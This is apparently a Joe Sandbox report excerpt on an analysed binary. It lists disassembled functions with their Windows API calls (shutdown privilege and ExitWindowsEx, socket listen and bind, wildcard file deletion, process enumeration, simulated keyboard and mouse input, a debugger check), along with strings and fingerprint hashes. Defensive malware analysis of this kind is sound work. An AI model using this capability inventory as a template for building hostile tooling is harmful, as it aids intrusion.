Function 007CE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 007C16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C170D
Part of subcall function 007C16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C173A
Part of subcall function 007C16C3: GetLastError.KERNEL32 ref: 007C174A

ExitWindowsEx.USER32(?,00000000), ref: 007CE932

Strings

@, xrefs: 007CE925
, xrefs: 007CE920
, xrefs: 007CE95C
SeShutdownPrivilege, xrefs: 007CE902

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 9efab3b76cc43b7a74f34ba582ea8b83957d4e9a71d7f81c5b73d838778386c8
Instruction ID: 432172e507df5e533ee5431cbe2a500c49bdba222ada3022abd3c8c52defc789
Opcode Fuzzy Hash: 9efab3b76cc43b7a74f34ba582ea8b83957d4e9a71d7f81c5b73d838778386c8
Instruction Fuzzy Hash: 9B012632610214EBEB5422B49C8AFBF735CA704740F15452DFC02E31D2D9BC6C80C295

Function 007E1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007E1276
WSAGetLastError.WSOCK32 ref: 007E1283
bind.WSOCK32(00000000,?,00000010), ref: 007E12BA
WSAGetLastError.WSOCK32 ref: 007E12C5
closesocket.WSOCK32(00000000), ref: 007E12F4
listen.WSOCK32(00000000,00000005), ref: 007E1303
WSAGetLastError.WSOCK32 ref: 007E130D
closesocket.WSOCK32(00000000), ref: 007E133C

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorLast$closesocket$bindlistensocket
String ID:
API String ID: 540024437-0
Opcode ID: 7ef7a9a62ad461d4cbccf6ae333713c9b639d62c5b4781d00f8be47ca041d1fb
Instruction ID: d094ba4c4e3e64c84bafa61f75a3160f051fa4f92fd05709e290622c60b7632e
Opcode Fuzzy Hash: 7ef7a9a62ad461d4cbccf6ae333713c9b639d62c5b4781d00f8be47ca041d1fb
Instruction Fuzzy Hash: 8141B131600140DFD710DF65C989B69BBE5BF4A318F58C188E9569F292C779EC81CBE1

Function 0079B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0079B9D4
_free.LIBCMT ref: 0079B9F8
_free.LIBCMT ref: 0079BB7F
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00803700), ref: 0079BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,0083121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0079BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00831270,000000FF,?,0000003F,00000000,?), ref: 0079BC36
_free.LIBCMT ref: 0079BD4B

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: 8a61e27661ac3848dd3b55b9a0371f7ac6aca4de455355a545733ad74b4935b3
Instruction ID: 08e3d57a7321689bd8a51107d9a194bb9d28c9c8ad534b421847df115b3562eb
Opcode Fuzzy Hash: 8a61e27661ac3848dd3b55b9a0371f7ac6aca4de455355a545733ad74b4935b3
Instruction Fuzzy Hash: 2DC12971904209EFCF20DF68BE49BAE7BB9EF81710F14459AE494D7291D7389E41C790

Function 007CD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00763AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00763A97,?,?,00762E7F,?,?,?,00000000), ref: 00763AC2

Part of subcall function 007CE199: GetFileAttributesW.KERNEL32(?,007CCF95), ref: 007CE19A

FindFirstFileW.KERNEL32(?,?), ref: 007CD420
DeleteFileW.KERNEL32(?,?,?,?), ref: 007CD470
FindNextFileW.KERNEL32(00000000,00000010), ref: 007CD481
FindClose.KERNEL32(00000000), ref: 007CD498
FindClose.KERNEL32(00000000), ref: 007CD4A1

Strings

\*.*, xrefs: 007CD3F2

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 6ff50d6762bd9b82c3fb189d86eac8f288660a07bf24cd01ea8dc21b78eb8309
Instruction ID: eb91586faaa713509eafa421a8467a18265515740393cb7323baa511fd433c55
Opcode Fuzzy Hash: 6ff50d6762bd9b82c3fb189d86eac8f288660a07bf24cd01ea8dc21b78eb8309
Instruction Fuzzy Hash: 5831A2310083859FC315EF60D955DAFB7A8BE91300F444A2DF9D693191EB38AE09DB63

Function 0079E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0079E645

Strings

1#IND, xrefs: 0079F83D
1#QNAN, xrefs: 0079F84B
1#SNAN, xrefs: 0079F844
1#INF, xrefs: 0079F852

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 6cf8557cbbf2682be4fbf868f101653d4ea7e9bf8c817c47c6919525075dbcf9
Instruction ID: 89b79fce50a931a1740ea0420004e0bb5bc2664ff8a8d075efa04ebc54eff42b
Opcode Fuzzy Hash: 6cf8557cbbf2682be4fbf868f101653d4ea7e9bf8c817c47c6919525075dbcf9
Instruction Fuzzy Hash: 42C24A72E086288FDF65CE28ED447EAB7B5EB48315F1441EAD44DE7241E778AE818F40

Function 007D648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007D64DC
CoInitialize.OLE32(00000000), ref: 007D6639
CoCreateInstance.OLE32(007FFCF8,00000000,00000001,007FFB68,?), ref: 007D6650
CoUninitialize.OLE32 ref: 007D68D4

Strings

.lnk, xrefs: 007D64BA, 007D6524, 007D65E0

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_wcslen
String ID: .lnk
API String ID: 886957087-24824748
Opcode ID: 07aaa68e1f23c1c0131b058471f73e3c358ff37d22ea760c380e13556565f2fd
Instruction ID: 7612ccab025a1acd94036aae3b5904a8a963a57a4cfa539e0b029d078cd885b4
Opcode Fuzzy Hash: 07aaa68e1f23c1c0131b058471f73e3c358ff37d22ea760c380e13556565f2fd
Instruction Fuzzy Hash: CBD15A71508301AFC304EF24C885A6BB7E8FF94704F14496DF5968B291EB75ED45CBA2

Function 007E22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,00000000), ref: 007E22E8

Part of subcall function 007DE4EC: GetWindowRect.USER32(?,?), ref: 007DE504

GetDesktopWindow.USER32 ref: 007E2312
GetWindowRect.USER32(00000000), ref: 007E2319
mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 007E2355
GetCursorPos.USER32(?), ref: 007E2381
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007E23DF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: f7ddc42ef79d88c4d8248fd9ddc380ef45fae67b92001bc2e837587afff2c524
Instruction ID: 3e1c0bb2644181a51d56f5fab4cbf0a79b12fbe14e89cf97b97f2a52d9a7af8e
Opcode Fuzzy Hash: f7ddc42ef79d88c4d8248fd9ddc380ef45fae67b92001bc2e837587afff2c524
Instruction Fuzzy Hash: 4131CD72505359ABC721DF15C849F6BBBAEFF88310F00091DF98597182DB38EA09CB96

Function 007D9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 007D9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 007D9C8B

Part of subcall function 007D3874: GetInputState.USER32 ref: 007D38CB
Part of subcall function 007D3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007D3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 007D9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007D9C75

Strings

*.*, xrefs: 007D9B5D

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 4bb0aefe2cf724d34a77a081edc323aec824cf819e2ca7d474892ca883ac9b82
Instruction ID: 7cc908f3f3d978508a8ad99f0bda45f36bbb015c358334f82f77938c1a98252a
Opcode Fuzzy Hash: 4bb0aefe2cf724d34a77a081edc323aec824cf819e2ca7d474892ca883ac9b82
Instruction Fuzzy Hash: 1C41507194420AEFDF15DF64C949AEEBBB8FF05310F144156E919A32A1EB389E84CF60

Function 00768060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON

Download Yara Rule

Strings

ERCP, xrefs: 0076813C
InitializeCriticalSectionEx, xrefs: 007A5D04
VUUU, xrefs: 007A5DF0
VUUU, xrefs: 007683E8
VUUU, xrefs: 0076843C
VUUU, xrefs: 007683FA

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID:
String ID: ERCP$InitializeCriticalSectionEx$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1173862840
Opcode ID: e50d94ed516820dba74abce0b77a4fe8e46190f33e45260ea262c60c41ef8efc
Instruction ID: e66bfccac7632a9474f0c60912296919502fff889e9df721004170420761d079
Opcode Fuzzy Hash: e50d94ed516820dba74abce0b77a4fe8e46190f33e45260ea262c60c41ef8efc
Instruction Fuzzy Hash: 34A27271E0061ACBDF64CF58C8447AEB7B1BF95310F24829AEC16A7285EB789D81CF51

Function 0077997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00779BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00779BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00779A4E
GetSysColor.USER32(0000000F), ref: 00779B23
SetBkColor.GDI32(?,00000000), ref: 00779B36

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 3cee0028e0cf394f72806b650dc5d87e59e215d872631b7b56362dc0eda9f6bc
Instruction ID: 91ceb991548dd903d7664474e65ce7d2b4ecf3b07d2e39ed1810e7f8b6f5efc3
Opcode Fuzzy Hash: 3cee0028e0cf394f72806b650dc5d87e59e215d872631b7b56362dc0eda9f6bc
Instruction Fuzzy Hash: 3EA1E97020B404FEEF299A2C8C5DFBB2A5DEBC2380B16C119F706C6695CA2D9D11D376

Function 007E1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007E304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007E307A
Part of subcall function 007E304E: _wcslen.LIBCMT ref: 007E309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007E185D
WSAGetLastError.WSOCK32 ref: 007E1884
bind.WSOCK32(00000000,?,00000010), ref: 007E18DB
WSAGetLastError.WSOCK32 ref: 007E18E6
closesocket.WSOCK32(00000000), ref: 007E1915

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 91766d07ec17d29c30ddfc3065345656db62ceeac23cd9704880a67a78728eb6
Instruction ID: 3010d0c89cded1c92c5176983d227dee072218bf75e1f678b32047dbaaef74f5
Opcode Fuzzy Hash: 91766d07ec17d29c30ddfc3065345656db62ceeac23cd9704880a67a78728eb6
Instruction Fuzzy Hash: 3951B371A00240DFDB11AF24C88AF6A77E5AB49758F488098F9469F393C779AD41CBA1

Function 007F1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 007F1CC0
IsWindowEnabled.USER32 ref: 007F1CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 007F1CDB
IsIconic.USER32 ref: 007F1CE9
IsZoomed.USER32 ref: 007F1CF7

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 4cb5e60c16f91a150a80435ec88e02ad6f53b48da31752440177d648be8cd113
Instruction ID: a68949d6db2694bca585b36a56b3172277f2aefa2087bc89e58e75105147360c
Opcode Fuzzy Hash: 4cb5e60c16f91a150a80435ec88e02ad6f53b48da31752440177d648be8cd113
Instruction Fuzzy Hash: E221D331740208DFD7218F2AC844B7A7BA5EF85324F998058E946CB351CB79EC42CBA4

Function 007EA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 007EA6AC
Process32FirstW.KERNEL32(00000000,?), ref: 007EA6BA

Part of subcall function 00769CB3: _wcslen.LIBCMT ref: 00769CBD

Process32NextW.KERNEL32(00000000,?), ref: 007EA79C
CloseHandle.KERNEL32(00000000), ref: 007EA7AB

Part of subcall function 0077CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,007A3303,?), ref: 0077CE8A

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 7d21caafb2d177a4587d15a12ce81ac84e5c65b3b0865206514fd9534a81ba67
Instruction ID: 3a1a2183085686cb8634fc9eafda699743ae60ac1d8a27f30ae160628ad72abb
Opcode Fuzzy Hash: 7d21caafb2d177a4587d15a12ce81ac84e5c65b3b0865206514fd9534a81ba67
Instruction Fuzzy Hash: 92514E71508340EFD710DF25C889A6BBBE8FF89754F40891DF98697291EB74E904CB92

Function 007CAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 007CAAAC
SetKeyboardState.USER32(00000080), ref: 007CAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 007CAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 007CAB88

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f7e86045aeb83d57b92701d36fdeb297f5f609326a9387e0faad6859831c3b09
Instruction ID: bd8a4ef1bbc8b239b94f8337edce63ca260a15d89d7ad3b959918f1bddea1d73
Opcode Fuzzy Hash: f7e86045aeb83d57b92701d36fdeb297f5f609326a9387e0faad6859831c3b09
Instruction Fuzzy Hash: 7231F3B0A4024CBEFB358E64CC09FFA7BA6AB44316F04821EF181965D1D77D8D81C766

Function 007DCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 007DCE89
GetLastError.KERNEL32(?,00000000), ref: 007DCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 007DCEFE

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 4fd7294093141a9e2524cd2a3c96a84fa840a341fd632ab23ba5f227fb46b23d
Instruction ID: ed2ab0c5befae003b4cb3b1fa515d34ce527b38b6f1b6d096ad7eb2e03fd73a6
Opcode Fuzzy Hash: 4fd7294093141a9e2524cd2a3c96a84fa840a341fd632ab23ba5f227fb46b23d
Instruction Fuzzy Hash: 60219DB2500306DBEB22DFA5C949BA777FCEB50354F10841EE546E2251E778EE04DB64

Function 007C8298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 007C82AA

Strings

|, xrefs: 007C82DA
(, xrefs: 007C82F0

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 4e9714fbf18625fc24bc8fc8f1903103d0deb643e449614d7c08af5360695e27
Instruction ID: ad4e3cd876c8d828f2d3dcf1fafe35bea8092f338211f12a9d8acf0f5fc26529
Opcode Fuzzy Hash: 4e9714fbf18625fc24bc8fc8f1903103d0deb643e449614d7c08af5360695e27
Instruction Fuzzy Hash: 32322374A00605DFCB68CF59C480E6AB7F0FF48710B15856EE59ADB7A1EB74E981CB40

Function 00792622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0079271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00792724
UnhandledExceptionFilter.KERNEL32(?), ref: 00792731

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9c764bc902422395cd07518a4b2bd1d1af9fc709366b632b3722c35163e952fe
Instruction ID: 302882d8a03e8b405d8fe2bc258d1352cd57253f01e6adb86c8df56ec701bda1
Opcode Fuzzy Hash: 9c764bc902422395cd07518a4b2bd1d1af9fc709366b632b3722c35163e952fe
Instruction Fuzzy Hash: 1031D57494121CABCB21EF64DD8879CBBB8BF08310F5081EAE41CA7261E7349F858F45

